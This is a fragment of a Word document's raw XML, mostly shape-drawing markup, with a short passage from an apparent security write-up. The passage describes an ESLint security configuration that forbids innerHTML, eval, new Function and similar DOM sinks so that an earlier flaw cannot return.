                                <a:cubicBezTo>
                                  <a:pt x="278855" y="0"/>
                                  <a:pt x="281100" y="930"/>
                                  <a:pt x="282961" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="284820" y="4645"/>
                                  <a:pt x="285750" y="6893"/>
                                  <a:pt x="285750" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="285750" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="285750" y="126451"/>
                                  <a:pt x="284820" y="128699"/>
                                  <a:pt x="282961" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="281100" y="132414"/>
                                  <a:pt x="278855" y="133344"/>
                                  <a:pt x="276225" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133344"/>
                                  <a:pt x="4650" y="132414"/>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89" name="Shape 789"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3181350" y="371475"/>
                            <a:ext cx="752475" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="752475" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="742950" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="745580" y="0"/>
                                  <a:pt x="747825" y="930"/>
                                  <a:pt x="749685" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="751544" y="4645"/>
                                  <a:pt x="752475" y="6893"/>
                                  <a:pt x="752475" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="752475" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="752475" y="126451"/>
                                  <a:pt x="751544" y="128699"/>
                                  <a:pt x="749685" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="747825" y="132414"/>
                                  <a:pt x="745580" y="133344"/>
                                  <a:pt x="742950" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133344"/>
                                  <a:pt x="4650" y="132414"/>
                                  <a:pt x="2790" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128699"/>
                                  <a:pt x="0" y="126451"/>
                                  <a:pt x="0" y="123825"/>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925" style="width:462pt;height:39.75pt;position:absolute;z-index:-2147483523;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:15.6797pt;mso-position-vertical-relative:text;margin-top:-17.4341pt;" coordsize="58673,5048">
                <v:shape id="Shape 760" style="position:absolute;width:9810;height:1428;left:0;top:0;" coordsize="981075,142875" path="m9525,0l971550,0c974180,0,976425,930,978285,2784c980145,4645,981075,6893,981075,9525l981075,133350c981075,135976,980145,138224,978285,140084c976425,141939,974180,142869,971550,142875l9525,142875c6895,142869,4650,141939,2790,140084c930,138224,0,135976,0,133350l0,9525c0,6893,930,4645,2790,2784c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 768" style="position:absolute;width:15144;height:1333;left:17716;top:2000;" coordsize="1514475,133350" path="m9525,0l1504950,0c1507580,0,1509825,930,1511685,2784c1513545,4645,1514475,6893,1514475,9525l1514475,123825c1514475,126451,1513545,128699,1511685,130559c1509825,132420,1507580,133350,1504950,133350l9525,133350c6895,133350,4650,132420,2790,130559c930,128699,0,126451,0,123825l0,9525c0,6893,930,4645,2790,2784c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 771" style="position:absolute;width:8763;height:1333;left:37052;top:2000;" coordsize="876300,133350" path="m9525,0l866775,0c869405,0,871650,930,873510,2784c875370,4645,876300,6893,876300,9525l876300,123825c876300,126451,875370,128699,873510,130559c871650,132420,869405,133350,866775,133350l9525,133350c6895,133350,4650,132420,2790,130559c930,128699,0,126451,0,123825l0,9525c0,6893,930,4645,2790,2784c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 774" style="position:absolute;width:5715;height:1333;left:46482;top:2000;" coordsize="571500,133350" path="m9525,0l561975,0c564605,0,566850,930,568710,2784c570570,4645,571500,6893,571500,9525l571500,123825c571500,126451,570570,128699,568710,130559c566850,132420,564605,133350,561975,133350l9525,133350c6895,133350,4650,132420,2790,130559c930,128699,0,126451,0,123825l0,9525c0,6893,930,4645,2790,2784c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 777" style="position:absolute;width:5810;height:1333;left:52863;top:2000;" coordsize="581025,133350" path="m9526,0l571500,0c574130,0,576376,930,578236,2784c580095,4645,581025,6893,581025,9525l581025,123825c581025,126451,580095,128699,578236,130559c576376,132420,574130,133350,571500,133350l9526,133350c6895,133350,4650,132420,2790,130559c930,128699,0,126451,1,123825l1,9525c0,6893,930,4645,2790,2784c4650,930,6895,0,9526,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 780" style="position:absolute;width:11049;height:1333;left:0;top:3714;" coordsize="1104900,133350" path="m9525,0l1095375,0c1098005,0,1100250,930,1102110,2784c1103970,4645,1104900,6893,1104900,9525l1104900,123825c1104900,126451,1103970,128699,1102110,130559c1100250,132414,1098005,133344,1095375,133350l9525,133350c6895,133344,4650,132414,2790,130559c930,128699,0,126451,0,123825l0,9525c0,6893,930,4645,2790,2784c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 783" style="position:absolute;width:13906;height:1333;left:11715;top:3714;" coordsize="1390650,133350" path="m9525,0l1381125,0c1383755,0,1386000,930,1387860,2784c1389720,4645,1390650,6893,1390650,9525l1390650,123825c1390650,126451,1389720,128699,1387860,130559c1386000,132414,1383755,133344,1381125,133350l9525,133350c6895,133344,4650,132414,2790,130559c930,128699,0,126451,0,123825l0,9525c0,6893,930,4645,2790,2784c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 786" style="position:absolute;width:2857;height:1333;left:26288;top:3714;" coordsize="285750,133350" path="m9525,0l276225,0c278855,0,281100,930,282961,2784c284820,4645,285750,6893,285750,9525l285750,123825c285750,126451,284820,128699,282961,130559c281100,132414,278855,133344,276225,133350l9525,133350c6895,133344,4650,132414,2790,130559c930,128699,0,126451,0,123825l0,9525c0,6893,930,4645,2790,2784c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 789" style="position:absolute;width:7524;height:1333;left:31813;top:3714;" coordsize="752475,133350" path="m9525,0l742950,0c745580,0,747825,930,749685,2784c751544,4645,752475,6893,752475,9525l752475,123825c752475,126451,751544,128699,749685,130559c747825,132414,745580,133344,742950,133350l9525,133350c6895,133344,4650,132414,2790,130559c930,128699,0,126451,0,123825l0,9525c0,6893,930,4645,2790,2784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A lint gate</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, so this cannot return. </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>eslint.security.config.js</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> forbids </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>document.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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innerHTML</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outerHTML</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insertAdjacentHTML</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dangerouslySetInnerHTML</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eval</w:t>
      </w:r>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 xml:space="preserve">new </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Function </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="10188" w:type="dxa"/>
        <w:tblInd w:w="45" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="223" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10188"/>
      </w:tblGrid>
      <w:tr w:rsidR="00345BB3" w:rsidRPr="005C54CB" w14:paraId="65BD8AFA" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1590"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1018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75FAB92B" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="45" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="3"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A detail worth recording.</w:t>
            </w:r>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> The obvious </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ESLint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> rule does not work here. </w:t>
            </w:r>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>no-restricted-properties</w:t>
            </w:r>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> with </w:t>
            </w:r>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>{object:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E9E8A6D" w14:textId="225607E4" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="0" w:line="311" w:lineRule="auto"/>
              <w:ind w:left="45" w:hanging="42"/>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8176" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5F66324A" wp14:editId="6EA428BB">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>3637359</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>-191838</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="2524126" cy="485775"/>
                      <wp:effectExtent l="0" t="0" r="0" b="0"/>
                      <wp:wrapNone/>
                      <wp:docPr id="26506" name="Group 26506"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                          <wpg:wgp>
                            <wpg:cNvGrpSpPr/>
                            <wpg:grpSpPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="2524126" cy="485775"/>
                                <a:chOff x="0" y="0"/>
                                <a:chExt cx="2524126" cy="485775"/>
                              </a:xfrm>
                            </wpg:grpSpPr>
                            <wps:wsp>
                              <wps:cNvPr id="794" name="Shape 794"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="295275" y="0"/>
                                  <a:ext cx="1457325" cy="133350"/>
                                </a:xfrm>
                                <a:custGeom>
                                  <a:avLst/>
                                  <a:gdLst/>
                                  <a:ahLst/>
                                  <a:cxnLst/>
                                  <a:rect l="0" t="0" r="0" b="0"/>
                                  <a:pathLst>
                                    <a:path w="1457325" h="133350">
                                      <a:moveTo>
                                        <a:pt x="9525" y="0"/>
                                      </a:moveTo>
                                      <a:lnTo>
                                        <a:pt x="1447800" y="0"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="1450431" y="0"/>
                                        <a:pt x="1452676" y="930"/>
                                        <a:pt x="1454535" y="2791"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="1456395" y="4645"/>
                                        <a:pt x="1457325" y="6893"/>
                                        <a:pt x="1457325" y="9525"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="1457325" y="123825"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="1457325" y="126451"/>
                                        <a:pt x="1456395" y="128699"/>
                                        <a:pt x="1454535" y="130559"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="1452676" y="132420"/>
                                        <a:pt x="1450431" y="133350"/>
                                        <a:pt x="1447800" y="133350"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="9525" y="133350"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="6895" y="133350"/>
                                        <a:pt x="4650" y="132420"/>
                                        <a:pt x="2790" y="130559"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="930" y="128699"/>
                                        <a:pt x="0" y="126451"/>
                                        <a:pt x="0" y="123825"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="0" y="9525"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="0" y="6893"/>
                                        <a:pt x="930" y="4645"/>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797" name="Shape 797"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="2028825" y="0"/>
                                  <a:ext cx="495300" cy="133350"/>
                                </a:xfrm>
                                <a:custGeom>
                                  <a:avLst/>
                                  <a:gdLst/>
                                  <a:ahLst/>
                                  <a:cxnLst/>
                                  <a:rect l="0" t="0" r="0" b="0"/>
                                  <a:pathLst>
                                    <a:path w="495300" h="133350">
                                      <a:moveTo>
                                        <a:pt x="9525" y="0"/>
                                      </a:moveTo>
                                      <a:lnTo>
                                        <a:pt x="495300" y="0"/>
                                      </a:lnTo>
                                      <a:lnTo>
                                        <a:pt x="495300" y="133350"/>
                                      </a:lnTo>
                                      <a:lnTo>
                                        <a:pt x="9525" y="133350"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="6894" y="133350"/>
                                        <a:pt x="4649" y="132420"/>
                                        <a:pt x="2789" y="130559"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="0" y="123826"/>
                                      </a:lnTo>
                                      <a:lnTo>
                                        <a:pt x="0" y="9524"/>
                                      </a:lnTo>
                                      <a:lnTo>
                                        <a:pt x="2789" y="2791"/>
                                      </a:ln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02" name="Shape 802"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="171450"/>
                                  <a:ext cx="514350" cy="142875"/>
                                </a:xfrm>
                                <a:custGeom>
                                  <a:avLst/>
                                  <a:gdLst/>
                                  <a:ahLst/>
                                  <a:cxnLst/>
                                  <a:rect l="0" t="0" r="0" b="0"/>
                                  <a:pathLst>
                                    <a:path w="514350" h="142875">
                                      <a:moveTo>
                                        <a:pt x="9525" y="0"/>
                                      </a:moveTo>
                                      <a:lnTo>
                                        <a:pt x="504825" y="0"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="507455" y="0"/>
                                        <a:pt x="509700" y="930"/>
                                        <a:pt x="511560" y="2784"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="513419" y="4645"/>
                                        <a:pt x="514350" y="6893"/>
                                        <a:pt x="514350" y="9525"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="514350" y="133350"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="514350" y="135976"/>
                                        <a:pt x="513419" y="138218"/>
                                        <a:pt x="511560" y="140078"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="509700" y="141939"/>
                                        <a:pt x="507455" y="142869"/>
                                        <a:pt x="504825" y="142875"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="9525" y="142875"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="6895" y="142869"/>
                                        <a:pt x="4650" y="141939"/>
                                        <a:pt x="2790" y="140078"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="930" y="138218"/>
                                        <a:pt x="0" y="135976"/>
                                        <a:pt x="0" y="133350"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="0" y="9525"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="0" y="6893"/>
                                        <a:pt x="930" y="4645"/>
                                        <a:pt x="2790" y="2784"/>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08" name="Shape 808"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="733425" y="342900"/>
                                  <a:ext cx="1219200" cy="142875"/>
                                </a:xfrm>
                                <a:custGeom>
                                  <a:avLst/>
                                  <a:gdLst/>
                                  <a:ahLst/>
                                  <a:cxnLst/>
                                  <a:rect l="0" t="0" r="0" b="0"/>
                                  <a:pathLst>
                                    <a:path w="1219200" h="142875">
                                      <a:moveTo>
                                        <a:pt x="9525" y="0"/>
                                      </a:moveTo>
                                      <a:lnTo>
                                        <a:pt x="1209675" y="0"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="1212306" y="0"/>
                                        <a:pt x="1214551" y="930"/>
                                        <a:pt x="1216410" y="2791"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="1218270" y="4651"/>
                                        <a:pt x="1219200" y="6896"/>
                                        <a:pt x="1219200" y="9525"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="1219200" y="133350"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="1219200" y="135976"/>
                                        <a:pt x="1218270" y="138224"/>
                                        <a:pt x="1216410" y="140084"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="1214551" y="141945"/>
                                        <a:pt x="1212306" y="142875"/>
                                        <a:pt x="1209675" y="142875"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="9525" y="142875"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="6895" y="142875"/>
                                        <a:pt x="4650" y="141945"/>
                                        <a:pt x="2790" y="140084"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="930" y="138224"/>
                                        <a:pt x="0" y="135976"/>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506" style="width:198.75pt;height:38.25pt;position:absolute;z-index:-2147483501;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:286.406pt;mso-position-vertical-relative:text;margin-top:-15.1054pt;" coordsize="25241,4857">
                      <v:shape id="Shape 794" style="position:absolute;width:14573;height:1333;left:2952;top:0;" coordsize="1457325,133350" path="m9525,0l1447800,0c1450431,0,1452676,930,1454535,2791c1456395,4645,1457325,6893,1457325,9525l1457325,123825c1457325,126451,1456395,128699,1454535,130559c1452676,132420,1450431,133350,1447800,133350l9525,133350c6895,133350,4650,132420,2790,130559c930,128699,0,126451,0,123825l0,9525c0,6893,930,4645,2790,2791c4650,930,6895,0,9525,0x">
                        <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                        <v:fill on="true" color="#edf2f6"/>
                      </v:shape>
                      <v:shape id="Shape 797" style="position:absolute;width:4953;height:1333;left:20288;top:0;" coordsize="495300,133350" path="m9525,0l495300,0l495300,133350l9525,133350c6894,133350,4649,132420,2789,130559l0,123826l0,9524l2789,2791c4649,930,6894,0,9525,0x">
                        <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                        <v:fill on="true" color="#edf2f6"/>
                      </v:shape>
                      <v:shape id="Shape 802" style="position:absolute;width:5143;height:1428;left:0;top:1714;" coordsize="514350,142875" path="m9525,0l504825,0c507455,0,509700,930,511560,2784c513419,4645,514350,6893,514350,9525l514350,133350c514350,135976,513419,138218,511560,140078c509700,141939,507455,142869,504825,142875l9525,142875c6895,142869,4650,141939,2790,140078c930,138218,0,135976,0,133350l0,9525c0,6893,930,4645,2790,2784c4650,930,6895,0,9525,0x">
                        <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                        <v:fill on="true" color="#edf2f6"/>
                      </v:shape>
                      <v:shape id="Shape 808" style="position:absolute;width:12192;height:1428;left:7334;top:3429;" coordsize="1219200,142875" path="m9525,0l1209675,0c1212306,0,1214551,930,1216410,2791c1218270,4651,1219200,6896,1219200,9525l1219200,133350c1219200,135976,1218270,138224,1216410,140084c1214551,141945,1212306,142875,1209675,142875l9525,142875c6895,142875,4650,141945,2790,140084c930,138224,0,135976,0,133350l0,9525c0,6896,930,4651,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699200" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2ABB84B2" wp14:editId="76DE76C1">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>141684</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>-20388</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1866900" cy="314325"/>
                      <wp:effectExtent l="0" t="0" r="0" b="0"/>
                      <wp:wrapNone/>
                      <wp:docPr id="26509" name="Group 26509"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                          <wpg:wgp>
                            <wpg:cNvGrpSpPr/>
                            <wpg:grpSpPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="1866900" cy="314325"/>
                                <a:chOff x="0" y="0"/>
                                <a:chExt cx="1866900" cy="314325"/>
                              </a:xfrm>
                            </wpg:grpSpPr>
                            <wps:wsp>
                              <wps:cNvPr id="799" name="Shape 799"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="1781175" cy="142875"/>
                                </a:xfrm>
                                <a:custGeom>
                                  <a:avLst/>
                                  <a:gdLst/>
                                  <a:ahLst/>
                                  <a:cxnLst/>
                                  <a:rect l="0" t="0" r="0" b="0"/>
                                  <a:pathLst>
                                    <a:path w="1781175" h="142875">
                                      <a:moveTo>
                                        <a:pt x="0" y="0"/>
                                      </a:moveTo>
                                      <a:lnTo>
                                        <a:pt x="1771650" y="0"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="1774280" y="0"/>
                                        <a:pt x="1776525" y="930"/>
                                        <a:pt x="1778385" y="2784"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="1780245" y="4645"/>
                                        <a:pt x="1781175" y="6893"/>
                                        <a:pt x="1781175" y="9525"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="1781175" y="133350"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="1781175" y="135976"/>
                                        <a:pt x="1780245" y="138218"/>
                                        <a:pt x="1778385" y="140078"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="1776525" y="141939"/>
                                        <a:pt x="1774280" y="142869"/>
                                        <a:pt x="1771650" y="142875"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="0" y="142875"/>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805" name="Shape 805"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="171450"/>
                                  <a:ext cx="1866900" cy="142875"/>
                                </a:xfrm>
                                <a:custGeom>
                                  <a:avLst/>
                                  <a:gdLst/>
                                  <a:ahLst/>
                                  <a:cxnLst/>
                                  <a:rect l="0" t="0" r="0" b="0"/>
                                  <a:pathLst>
                                    <a:path w="1866900" h="142875">
                                      <a:moveTo>
                                        <a:pt x="9525" y="0"/>
                                      </a:moveTo>
                                      <a:lnTo>
                                        <a:pt x="1857375" y="0"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="1860005" y="0"/>
                                        <a:pt x="1862250" y="930"/>
                                        <a:pt x="1864110" y="2791"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="1865970" y="4651"/>
                                        <a:pt x="1866900" y="6896"/>
                                        <a:pt x="1866900" y="9525"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="1866900" y="133350"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="1866900" y="135976"/>
                                        <a:pt x="1865970" y="138224"/>
                                        <a:pt x="1864110" y="140084"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="1862250" y="141945"/>
                                        <a:pt x="1860005" y="142875"/>
                                        <a:pt x="1857375" y="142875"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="9525" y="142875"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="6895" y="142875"/>
                                        <a:pt x="4650" y="141945"/>
                                        <a:pt x="2790" y="140084"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="930" y="138224"/>
